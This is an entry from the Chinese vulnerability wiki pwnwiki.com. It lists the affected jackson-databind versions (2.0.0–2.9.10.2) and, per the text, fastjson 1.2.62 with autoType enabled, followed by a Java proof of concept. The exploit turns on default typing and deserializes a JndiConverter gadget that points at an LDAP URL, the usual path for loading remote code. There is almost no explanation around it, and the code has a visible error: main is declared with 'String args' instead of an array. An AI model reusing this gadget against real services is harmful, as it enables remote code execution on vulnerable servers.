PWNWIK.COM==免费、自由、人人可编辑的漏洞库
,
漏洞影响
jackson-databind 2.0.0 – 2.9.10.2
经验证fastjson在开启了autoType功能的情况下,影响最新的fastjson v1.2.62版本
POC
import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;
public class Poc {
public static void main(String args) {
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
String json = "\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://localhost:1389/ExportObject\"}";
try {
mapper.readValue(json, Object.class);
} catch (IOException e) {
e.printStackTrace();
}
}
}
免费、自由、人人可编辑的漏洞库--pwnwiki.com
